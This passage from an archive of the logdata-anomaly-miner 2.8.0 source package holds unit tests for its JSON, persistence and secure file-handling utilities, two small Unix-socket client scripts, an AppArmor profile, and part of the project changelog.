unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/__init__.py000066400000000000000000000000001500476301700255220ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/000077500000000000000000000000001500476301700227355ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/JsonUtilTest.py000066400000000000000000000061701500476301700257220ustar00rootroot00000000000000import unittest from aminer.util.JsonUtil import encode_object, decode_object, dump_as_json, load_json from unit.TestBase import TestBase class JsonUtilTest(TestBase): """Unittests for the JsonUtil class.""" def test1encode_decode(self): """This test method encodes/decodes objects into/from the JSON-format.""" # strings s = 'this is a normal string to be serialized' pre = 'string:' enc = encode_object(s) self.assertEqual(enc, pre + s) self.assertEqual(decode_object(enc), s) # bytes s = b'this is a bytestring to be serialized' pre = b'bytes:' enc = encode_object(s) self.assertEqual(enc, pre.decode() + s.decode()) self.assertEqual(decode_object(s), s) self.assertEqual(decode_object(enc), s) s = bytes.fromhex('001B') enc = encode_object(s) self.assertEqual(enc, pre.decode() + '%00%1b') self.assertEqual(decode_object(enc), s) # iterables lis = [b'1', '2', 3, ['4'], {'5', '6'}, {'key': 'val', tuple([1,"2",None]): 'otherVal'}] res = ['bytes:1', 'string:2', 3, ['string:4'], ['string:' + x for x in lis[4]], {'string:key': 'string:val', "tuple:(1, '2', None)": 'string:otherVal'}] enc = encode_object(lis) self.assertEqual(enc, res) lis[4] = list(lis[4]) self.assertEqual(decode_object(enc), lis) tup = (b'1', '2', 3, ['4'], {'5', '6'}, {'key': 'val', tuple([1,"2",None]): 'otherVal'}) enc = encode_object(tup) self.assertEqual(enc, res) self.assertEqual(decode_object(enc), lis) dictionary = {'user': 'defaultUser', 'password': b'topSecret', 'id': 25} enc = encode_object(dictionary) self.assertEqual(enc, {'string:user': 'string:defaultUser', 'string:password': 'bytes:topSecret', 'string:id': 25}) self.assertEqual(decode_object(enc), dictionary) # booleans boolean1 = True enc = encode_object(boolean1) self.assertEqual(enc, True) self.assertEqual(decode_object(enc), True) # integers integer1 = 125 enc = encode_object(integer1) self.assertEqual(enc, 125) self.assertEqual(decode_object(enc), 125) # floats float1 = 125.25 enc = encode_object(float1) self.assertEqual(enc, 125.25) self.assertEqual(decode_object(enc), 125.25) def test2dump_load_json(self): """ This test method serializes an object by encoding it into a JSON-formatted string. Annotation: external classes and methods are not tested and assumed to be working as intend. """ tup = (b'1', '2', 3, ['4']) enc = '["bytes:1", "string:2", 3, ["string:4"]]' self.assertEqual(dump_as_json(tup), enc) self.assertEqual(load_json(enc), list(tup)) def test3load_json(self): """ This test method loads a serialized string and deserializes it by decoding into an object. Annotation: external classes and methods are not tested and assumed to be working as intend. """ if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/PersistenceUtilTest.py000066400000000000000000000210621500476301700272720ustar00rootroot00000000000000import unittest import sys import os import tempfile from io import StringIO from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.util import PersistenceUtil from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.util import SecureOSFunctions from unit.TestBase import TestBase class PersistenceUtilTest(TestBase): """Unittests for the PersistenceUtil class.""" def test1add_persistable_component(self): """ Add a component to the registry of all persistable components. Also test the type of the component, as this task is only performed once for each component. """ old_stderr = sys.stderr sys.stderr = StringIO() # component is not PersistableComponentInterface (raise TypeError) some_object = {"key": "this is not working"} self.assertRaises(TypeError, PersistenceUtil.add_persistable_component(some_object)) # working example - the component is added implicitly. nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Test", True) # check persistence ID warning PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = False PersistenceUtil.add_persistable_component(nmpd) self.assertEqual(sys.stderr.getvalue(), 'Warning: Detectors of type NewMatchPathDetector use the persistence_id "Test" multiple' ' times. Please assign a unique persistence_id for every component.\n') self.reset_output_stream() PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = True PersistenceUtil.add_persistable_component(nmpd) self.assertEqual(self.output_stream.getvalue(), "") sys.stderr = old_stderr def test2open_persistence_file(self): """Test opening a persistence file. Also check if the type of the file_name is string or bytes.""" # test type checks file = "/tmp/persistence" PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW | os.O_CREAT) os.remove(file) PersistenceUtil.open_persistence_file(file.encode(), os.O_RDONLY | os.O_NOFOLLOW | os.O_CREAT) os.remove(file) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, 123, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, 123.22, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, True, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, None, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, {"id": "Default"}, os.O_RDONLY | os.O_NOFOLLOW) self.assertRaises(TypeError, PersistenceUtil.open_persistence_file, ["Default"], os.O_RDONLY | os.O_NOFOLLOW) # path does not exist (O_CREAT flag not set) self.assertRaises(FileNotFoundError, PersistenceUtil.open_persistence_file, file, os.O_RDONLY | os.O_NOFOLLOW) # path does not exist (O_CREAT flag set) - repeat if it exists and check if fd is returned fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW | os.O_CREAT) self.assertIsNotNone(fd) # path exists fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW) self.assertIsNotNone(fd) os.remove(file) def test3replace_persistence_file(self): """Test replacing the name of the persistence file.""" # path does not exist file = "/tmp/persistence" fd, _ = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, b"file2") PersistenceUtil.replace_persistence_file(file, fd) fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY) self.assertEqual(os.read(fd, 50), b"file2") os.close(fd) # path exists fd = PersistenceUtil.open_persistence_file(file, os.O_WRONLY | os.O_CREAT) os.write(fd, b"file1") os.close(fd) fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY) self.assertEqual(os.read(fd, 50), b"file1") os.close(fd) fd, _ = tempfile.mkstemp(dir=SecureOSFunctions.tmp_base_dir_path) os.write(fd, b"file2") PersistenceUtil.replace_persistence_file(file, fd) fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY | os.O_NOFOLLOW) self.assertEqual(os.read(fd, 50), b"file2") os.remove(file) def test4load_json(self): """Load persisted json data.""" # path does not exist file = "/tmp/persistence" self.assertEqual(PersistenceUtil.load_json(file), None) # json data corrupted fd = PersistenceUtil.open_persistence_file(file, os.O_WRONLY | os.O_CREAT) os.write(fd, b"file1") os.close(fd) self.assertRaises(ValueError, PersistenceUtil.load_json, file) # working example fd = PersistenceUtil.open_persistence_file(file, os.O_WRONLY) os.write(fd, b'{"key": "value"}') os.close(fd) data = PersistenceUtil.load_json(file) self.assertEqual(data, {"key": "value"}) os.remove(file) def test5store_json(self): """Store json data into the persistence file.""" # json data corrupted file = "/tmp/persistence" PersistenceUtil.store_json(file, b"file") fd = PersistenceUtil.open_persistence_file(file, os.O_RDONLY) self.assertEqual(os.read(fd, 50), b'"bytes:file"') os.close(fd) os.remove(file) def test6create_missing_directories(self): """Test if all missing directories are created.""" # only base directory exists file = "/tmp/persistence/data1/data2" PersistenceUtil.create_missing_directories(file) self.assertTrue(os.path.exists("/tmp/persistence/data1")) self.assertFalse(os.path.exists("/tmp/persistence/data1/data2")) # path already exists PersistenceUtil.create_missing_directories(file) self.assertTrue(os.path.exists("/tmp/persistence/data1")) self.assertFalse(os.path.exists("/tmp/persistence/data1/data2")) os.rmdir("/tmp/persistence/data1") os.rmdir("/tmp/persistence") def test7clear_persistence(self): """Test if clearing the persistence data works properly.""" base_path = "/tmp/persistence" os.mkdir(base_path) os.mkdir(os.path.join(base_path, "backup")) os.mkdir(os.path.join(base_path, "data1")) os.mkdir(os.path.join(base_path, "data2")) fd = PersistenceUtil.open_persistence_file(os.path.join(base_path, "data1", "file1.txt"), os.O_WRONLY | os.O_CREAT) os.close(fd) PersistenceUtil.clear_persistence(base_path) self.assertTrue(os.path.exists(os.path.join(base_path, "backup"))) self.assertFalse(os.path.exists(os.path.join(base_path, "data1"))) self.assertFalse(os.path.exists(os.path.join(base_path, "data2"))) self.assertFalse(os.path.exists(os.path.join(base_path, "data1", "file1.txt"))) os.rmdir(os.path.join(base_path, "backup")) os.rmdir(base_path) def test8copytree(self): """Test if our copytree is working as expected even when the destination directory is existing.""" # destination directory not existing base_path = "/tmp/persistence" new_base_path = "/tmp/persistence1" os.mkdir(base_path) os.mkdir(os.path.join(base_path, "backup")) PersistenceUtil.copytree(base_path, new_base_path) self.assertTrue(os.path.exists(os.path.join(base_path, "backup"))) self.assertTrue(os.path.exists(os.path.join(new_base_path, "backup"))) # destination directory existing self.assertRaises(FileExistsError, PersistenceUtil.copytree, base_path, new_base_path) PersistenceUtil.clear_persistence(base_path) PersistenceUtil.copytree(os.path.join(base_path, "backup"), os.path.join(new_base_path, "backup")) os.rmdir(os.path.join(base_path, "backup")) os.rmdir(base_path) os.rmdir(os.path.join(new_base_path, "backup")) os.rmdir(new_base_path) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/SecureOSFunctionsTest.py000066400000000000000000000217771500476301700275460ustar00rootroot00000000000000import unittest import sys import os import socket import subprocess from _io import StringIO import fcntl from aminer.util import SecureOSFunctions from aminer.input.LogStream import UnixSocketLogDataResource from unit.TestBase import TestBase class SecureOSFunctionsTestLocal(TestBase): """This test class must be run locally due to import problems.""" def setUp(self): super().setUp() if SecureOSFunctions.base_dir_fd is not None: SecureOSFunctions.close_base_directory() SecureOSFunctions.base_dir_fd = None SecureOSFunctions.tmp_base_dir_fd = None SecureOSFunctions.log_dir_fd = None SecureOSFunctions.base_dir_path = None SecureOSFunctions.tmp_base_dir_path = None SecureOSFunctions.log_dir_path = None def tearDown(self): """Reset all global variables.""" super().tearDown() SecureOSFunctions.base_dir_fd = None SecureOSFunctions.tmp_base_dir_fd = None SecureOSFunctions.log_dir_fd = None SecureOSFunctions.base_dir_path = None SecureOSFunctions.tmp_base_dir_path = None SecureOSFunctions.log_dir_path = None def test1secure_open_close_base_directory(self): self.assertRaises(ValueError, SecureOSFunctions.secure_open_base_directory) self.assertRaises(ValueError, SecureOSFunctions.secure_open_base_directory, "base/directory") base_dir_fd = SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer") self.assertIsNotNone(SecureOSFunctions.base_dir_fd) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_fd) self.assertIsNotNone(SecureOSFunctions.base_dir_path) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_path) self.assertEqual(base_dir_fd, SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer")) self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(SecureOSFunctions.base_dir_fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(SecureOSFunctions.tmp_base_dir_fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. self.assertIsNotNone(SecureOSFunctions.base_dir_fd) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_fd) self.assertIsNotNone(SecureOSFunctions.base_dir_path) self.assertIsNotNone(SecureOSFunctions.tmp_base_dir_path) SecureOSFunctions.close_base_directory() self.assertIsNone(SecureOSFunctions.base_dir_fd) self.assertIsNone(SecureOSFunctions.tmp_base_dir_fd) self.assertIsNone(SecureOSFunctions.base_dir_path) SecureOSFunctions.close_base_directory() # no exception should be raised def test2secure_open_close_log_directory(self): self.assertRaises(ValueError, SecureOSFunctions.secure_open_log_directory) self.assertRaises(ValueError, SecureOSFunctions.secure_open_log_directory, "base/directory") SecureOSFunctions.secure_open_log_directory("/tmp/lib/aminer/util/log") self.assertIsNotNone(SecureOSFunctions.log_dir_fd) self.assertIsNotNone(SecureOSFunctions.log_dir_path) self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(SecureOSFunctions.log_dir_fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. SecureOSFunctions.close_log_directory() self.assertIsNone(SecureOSFunctions.log_dir_fd) self.assertIsNone(SecureOSFunctions.log_dir_path) SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer/util") SecureOSFunctions.secure_open_log_directory("/tmp/lib/aminer/util/log") SecureOSFunctions.close_log_directory() SecureOSFunctions.close_base_directory() def test3secure_open_file(self): file = open("/tmp/lib/aminer/util/log/test.log", "w") file.close() self.assertRaises(ValueError, SecureOSFunctions.secure_open_file, "base/directory", os.O_NOFOLLOW | os.O_NOCTTY) self.assertRaises(Exception, SecureOSFunctions.secure_open_file, "/tmp/lib/aminer/util/log", os.O_NOFOLLOW | os.O_NOCTTY) fd = SecureOSFunctions.secure_open_file("/tmp/lib/aminer/util/log", os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY) self.assertEqual(os.O_NOFOLLOW | os.O_DIRECTORY, fcntl.fcntl(fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY | os.O_DIRECTORY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. os.close(fd) fd = SecureOSFunctions.secure_open_file("/tmp/lib/aminer/util/log/test.log", os.O_NOFOLLOW | os.O_NOCTTY) self.assertEqual(os.O_NOFOLLOW, fcntl.fcntl(fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. os.close(fd) SecureOSFunctions.secure_open_base_directory("/tmp/lib/aminer/util") fd = SecureOSFunctions.secure_open_file("/tmp/lib/aminer/util/log/test.log", os.O_NOFOLLOW | os.O_NOCTTY) self.assertEqual(os.O_NOFOLLOW, fcntl.fcntl(fd, fcntl.F_GETFL) & (os.O_NOFOLLOW | os.O_NOCTTY)) # os.O_NOCTTY is not included, because it is no terminal controlling device. os.close(fd) SecureOSFunctions.close_base_directory() def test4send_annotated_file_descriptor(self): """A valid annotated file descriptor is to be sent by a socket.""" sock_name = '/tmp/test4unixSocket.sock' data = b'readmeStream' + b'\x00' + b'You should read these README instructions for better understanding.' proc = subprocess.Popen(['python3', 'unit/util/clientTest4.py']) if os.path.exists(sock_name): os.remove(sock_name) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test4unixSocket.sock', connection.fileno()) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 80) self.assertEqual(unix_socket_log_data_resource.buffer, b'') proc.wait() connection.close() server.close() def test5send_annotated_file_descriptor_invalid_parameters(self): """Invalid access is to be performed by using a closed socket.""" fd = SecureOSFunctions.secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) self.assertRaises(OSError, SecureOSFunctions.send_annotated_file_descriptor, client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') client.close() def test6send_logstream_descriptor(self): """A valid logstream descriptor is to be sent.""" sock_name = '/tmp/test6unixSocket.sock' data = b'logstream' + b'\x00' + b'/var/log/syslog' proc = subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test6unixSocket.sock', connection.fileno()) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 25) self.assertEqual(unix_socket_log_data_resource.buffer, b'') proc.wait() connection.close() server.close() def test7receive_annotated_file_descriptor(self): """A valid annotated file descriptor is to be received by a socket.""" sock_name = '/tmp/test6unixSocket.sock' type_info = b'logstream' path = b'/var/log/syslog' data = (type_info, path) proc = subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] data_tuple = SecureOSFunctions.receive_annotated_file_descriptor(connection) self.assertEqual(data_tuple[1], data[0]) self.assertEqual(data_tuple[2], data[1]) self.assertEqual(len(data_tuple[1]) + len(data_tuple[2]), 24) proc.wait() connection.close() server.close() if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/__init__.py000066400000000000000000000000001500476301700250340ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/clientTest4.py000066400000000000000000000010711500476301700255100ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('./') sys.path.append('../../') from aminer.util.SecureOSFunctions import secure_open_file, send_annotated_file_descriptor sock_name = '/tmp/test4unixSocket.sock' fd = secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_annotated_file_descriptor(client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') client.close() os.close(fd) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/util/clientTest6.py000066400000000000000000000007261500476301700255200ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('../../') sys.path.append('./') from aminer.util.SecureOSFunctions import secure_open_file, send_logstream_descriptor sock_name = '/tmp/test6unixSocket.sock' fd = secure_open_file(b'/var/log/syslog', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_logstream_descriptor(client, fd, b'/var/log/syslog') client.close() os.close(fd) logdata-anomaly-miner-2.8.0/apparmor.profile000066400000000000000000000010041500476301700211030ustar00rootroot00000000000000# Last Modified: Wed Feb 19 14:58:42 2025 abi , include /usr/lib/logdata-anomaly-miner/aminer.py { include include include include include capability dac_override, /usr/bin/dash ix, /usr/bin/dpkg-divert mrix, /usr/bin/fgrep mrix, /usr/bin/python3.12 ix, /usr/lib/logdata-anomaly-miner/aminer.py Px, /usr/lib/logdata-anomaly-miner/aminer.py r, } logdata-anomaly-miner-2.8.0/changelog000066400000000000000000000611361500476301700175660ustar00rootroot00000000000000logdata-anomaly-miner (2.8.0) unstable; urgency=low Bugfixes: * fix suspendModeTest * fix issues with np.math * fix AMINERSRC variable in aminer_install script * fix error message in ByteStreamLineAtomizer * Fix stop_learning_time * Fix closing of Zmq producer socket at graceful shutdown * Fix sorting of None values in NMPVCD.do_persist() Changes: * Rewrite of aminerwrapper * Set latest working python-kafka version * Remove restrictive flags in aminer, so the conf-enabled directory is not needed any more -> still need to keep conf-enabled to use custom parsing models * Allow resource_name to be of type bytes * Allow ParserMatch to be None in LogAtom * Improve LogResourceList error message when url does not start with file:// or unix:// * Add an optional log line identifier to json output * Remove proposed AminerStartTimestamp parameter and implement dynamic per detector stop_learning_time setup in NMPD * Implement dynamic per detector stop_learning_time setup * Add comment explaining the lambda function in the NMPVCD.do_persist() method -- Markus Wurzenberger Thu, 01 May 2025 12:00:00 +0000 logdata-anomaly-miner (2.7.0) unstable; urgency=low Bugfixes: * Fix broken links to python-modules * Fix initalization time index in EFD * Fix correct time index when learn mode is off * Fix edge case where confidence is divided by 0 in EventFrequencyDetector * Fix time until learn_mode is switched automatically * Fix issue where numerical values could not be used in CharsetDetector and EntropyDetector * Fix feature list order in PCA detector * Fix time index persistence in EFD * Fix last seen log in EFD * Fix newline parsing in json string values. * Fix issue of nested optional json dictionaries not parsing. Changes: * Implemented mechanism to allow granular configuration of LogResources. * Add seasonality to EFD * Add atom time in reset counter method * Add output_event_handlers parameter to the unparsed event handlers. * Add stop_learning_time and stop_learning_no_anomaly_time to schemas * Change id_path_list parameter to be optional in ValueRangeDetector. * Imporove JsonModelElement parser * Add learn mode and detection thresholds in MatchValueAverageChangeDetector * Implement AminerId config property * Add LogResource to the json output of anomalies * Add use_real_time parameter to yaml config * Move manpages to Debian independent directory * Add ignore_log_resource parameter to analysis components. * Improved performance of JsonModelElement * Add XmlModelElement * Implement stop_learning_time parameters in MatchValueAverageChangeDetector. * Add support for Debian Bookworm * Updated to urllib 1.26.19 * Updated scipy to 1.10.0 * Extend missing timestamp warning in ByteStreamLineAtomizer. * Enhance timezones in DateTimeModelElement * Increase default persistence time * Add support for Redhat based Linux * Improved documenation -- Markus Wurzenberger Thu, 11 Jul 2024 12:00:00 +0000 logdata-anomaly-miner (2.6.1) unstable; urgency=low Changes: * minor refactoring * fixed code styling issues -- Markus Wurzenberger Tue, 21 Feb 2023 12:00:00 +0000 logdata-anomaly-miner (2.6.0) unstable; urgency=low Bugfixes: * fixed bug in JsonModelElement where the aminer gets stuck in an endless loop searching for \x. * added input file path sanitization and fixed exception handling. * fixed a test for the remote control save config method. * fixed bug, that occured when starting one of the detectors VTD, VCD and TSA with an already existing persistency of the ETD, but not of the detectors. * fixed the MissingMatchPathValueDetector by comparing the detector_info[0] instead of the old_last_seen_timestamp. * ParserCount: Fixed timestamp in output * implemented the output_logline parameter in the NewMatchPathValueDetector. * fixed bug where the MissingMatchPathListValueDetector could not be used in yaml, because the ConfigValidator could not load the module. * runHowToEntropyDetector had missing permissions on CFG_PATH in some lines. * fixed bug with closing the streams. Changes: * renamed schemas to python files. * enabled systemd autorestart * improved documentation * added SlidingEventFrequencyDetector * added timestamp_scale parameter to the DateTimeModelElement. * added unique path param for EFD * added check so EXP_TYPE_MANDATORY is enforced. * replace raw data output with last log of event type rather than end of time window * added event count cluster detector * added experimental jsonstringparser * improved parameter consistency * added ScoringEventHandler * EFD: Added the functionality to analze the scoring_path_list with the ScoringEventHandler * ETD/TSA: Moved the initialization part of the TSA from the ETD to the TSA * support for ZeroMQ-Eventhandler * added support for named-pipes -- Markus Wurzenberger Fri, 20 Jan 2023 12:00:00 +0000 logdata-anomaly-miner (2.5.1) unstable; urgency=low Bugfixes: * EFD: Fixed problem that appears with empty windows * Fixed index out of range if matches are empty in JsonModelElement array. * EFD: Fixed problem that appears with empty windows * EFD: Enabled immediate detection without training, if both limits are set * EFD: Fixed bug related to auto_include_flag * Remove spaces in aminer logo * ParserCounter: Fixed do_timer * Fixed code to allow the usage of AtomFilterMatchAction in yaml configs * Fixed JsonModelElement when json object is null * Fix incorrect message of charset detector * Fix match list handling for json objects * Fix incorrect message of charset detector Changes: * Added nullable functionality to JsonModelElements * Added include-directive to supervisord.conf * ETD: Output warning when count first exceeds range * EFD: Added option to output anomaly when the count first exceeds the range * VTD: Added variable type 'range' * EFD: Added the function reset_counter * EFD: Added option to set the lower and upper limit of the range interval * Enhance EFD to consider multiple time windows * VTD: Changed the value of parameter num_updates_until_var_reduction to track all variables from False to 0. * PAD: Used the binom_test of the scipy package as test if the model should be reinitialized if too few anomalies occur than are expected * Add ParsedLogAtom to aminer parser to ensure compatibility with lower versions * Added script to add build-id to the version-string * Support for installations from source in install-script * Fixed and stadardize the persistence time of various detectors * Refactoring * Improve performance * Improve output handling * Improved testing -- Markus Wurzenberger Mon, 09 May 2022 12:00:00 +0000 logdata-anomaly-miner (2.5.0) unstable; urgency=low Bugfixes: * Fixed bug in YamlConfig Changes: * Added supervisord to docker * Moved unparsed atom handlers to analysis(yamlconfig) * Moved new_match_path_detector to analysis(yamlconfig) * Refactor: merged all UnparsedHandlers into one python-file * Added remotecontrol-command for reopening eventhandlers * Added config-parameters for logrotation * Improved testing -- Markus Wurzenberger Fri, 03 Dec 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.2) unstable; urgency=low Bugfixes: * PVTID: Fixed output format of previously appeared times * VTD: Fixed bugs (static -> discrete) * VTD: Fixed persistency-bugs * Fixed %z performance issues * Fixed error where optional keys with an array type are not parsed when being null * Fixed issues with JasonModelElement * Fixed persistence handling for ValueRangeDetector * PTSAD: Fixed a bug, which occurs, when the ETD stops saving the values of one analyzed path * ETD: Fixed the problem when entries of the match_dictionary are not of type MatchElement * Fixed error where json data instead of array was parsed successfully. Changes: * Added multiple parameters to VariableCorrelationDetector * Improved VTD * PVTID: Renamed parameter time_window_length to time_period_length * PVTID: Added check if atom time is None * Enhanced output of MTTD and PVTID * Improved docker-compose-configuration * Improved testing * Enhanced PathArimaDetector * Improved documentation * Improved KernelMsgParsingModel * Added pretty print for json output * Added the PathArimaDetector * TSA: Added functionality to discard arima models with too few log lines per time step * TSA: improved confidence calculation * TSA: Added the option to force the period length * TSA: Automatic selection of the pause area of the ACF * Extended EximGenericParsingModel * Extended AudispdParsingModel -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1) unstable; urgency=low Bugfixes: * Fixed issues with array of arrays in JsonParser * Fixed problems with invalid json-output * Fixed ValueError in DTME * Fixed error with parsing floats in scientific notation with the JsonModelElement. * Fixed issue with paths in JsonModelElement * Fixed error with \x encoded json * Fixed error where EMPTY_ARRAY and EMPTY_OBJECT could not be parsed from the yaml config * Fixed a bug in the TSA when encountering a new event type * Fixed systemd script * Fixed encoding errors when reading yaml configs Changes: * Add entropy detector * Add charset detector * Add value range detector * Improved ApacheAccessModel, AudispdParsingModel * Refactoring * Improved documentation * Improved testing * Improved schema for yaml-config * Added EMPTY_STRING option to the JsonModelElement * Implemented check to report unparsed atom if ALLOW_ALL is used with data with a type other than list or dict -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0) unstable; urgency=low Bugfixes: * Fixed error in JsonModelElement * Fixed problems with umlauts in JsonParser * Fixed problems with the start element of the ElementValueBranchModelElement * Fixed issues with the stat and debug command line parameters * Fixed issues if posix acl are not supported by the filesystem * Fixed issues with output for non ascii characters * Modified kafka-version Changes: * Improved command-line-options install-script * Added documentation * Improved VTD CM-Test * Improved unit-tests * Refactoring * Added TSAArimaDetector * Improved ParserCount * Added the PathValueTimeIntervalDetector * Implemented offline mode * Added PCA detector * Added timeout-paramter to ESD -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1) unstable; urgency=low Bugfixes: * Replaced username and groupname with uid and gid for chown() * Removed hardcoded username and groupname -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0) unstable; urgency=low Bugfixes: * Changed pyyaml-version to 5.4 * NewMatchIdValueComboDetector: Fix allow multiple values per id path * ByteStreamLineAtomizer: fixed encoding error * Fixed too many open directory-handles * Added close() function to LogStream Changes: * Added EventFrequencyDetector * Added EventSequenceDetector * Added JsonModelElement * Added tests for Json-Handling * Added command line parameter for update checks * Improved testing * Splitted yaml-schemas into multiple files * Improved support for yaml-config * YamlConfig: set verbose default to true * Various refactoring -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1) unstable; urgency=low Bugfixes: * Fixed warnigs due to files in Persistency-Directory * Fixed ACL-problems in dockerfile and autocreate /var/lib/aminer/log Changes: * added simple test for dockercontainer * negate result of the timeout-command. 1 is okay. 0 must be an error * added bullseye-tests * make tmp-dir in debian-bullseye-test and debian-buster-test unique -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0) unstable; urgency=low Changes: * Added Dockerfile * Addes checks for acl of persistency directory * Added VariableCorrelationDetector * Added tool for managing multiple persistency files * Added supress-list for output * Added suspend-mode to remote-control * Added requirements.txt * Extended documentation * Extended yaml-configuration-support * Standardize command line parameters * Removed --Forground cli parameter * Fixed Security warnings by removing functions that allow race-condition * Refactoring * Ethical correct naming of variables * Enhanced testing * Added statistic outputs * Enhanced status info output * Changed global learn_mode behavior * Added RemoteControlSocket to yaml-config * Reimplemented the default mailnotificationhandler Bugfixes: * Fixed typos in documentation * Fixed issue with the AtomFilter in the yaml-config * Fixed order of ETD in yaml-config * Fixed various issues in persistency -- Markus Wurzenberger Fri, 18 Dec 2020 17:00:00 +0000 logdata-anomaly-miner (2.1.0) unstable; urgency=low Changes: * Added VariableTypeDetector,EventTypeDetector and EventCorrelationDetector * Added support for unclean format strings in the DateTimeModelElement * Added timezones to the DateTimeModelElement * Enhanced ApacheAccessModel * Yamlconfig: added support for kafka stream * Removed cpu limit configuration * Various refactoring * Yamlconfig: added support for more detectors * Added new command-line-parameters * Renamed executables to aminer.py and aminerremotecontroly.py * Run Aminer in forgroundd-mode per default * Added various unit-tests * Improved yamlconfig and checks * Added start-config for parser to yamlconfig * Renamed config templates * Removed imports from init.py for better modularity * Created 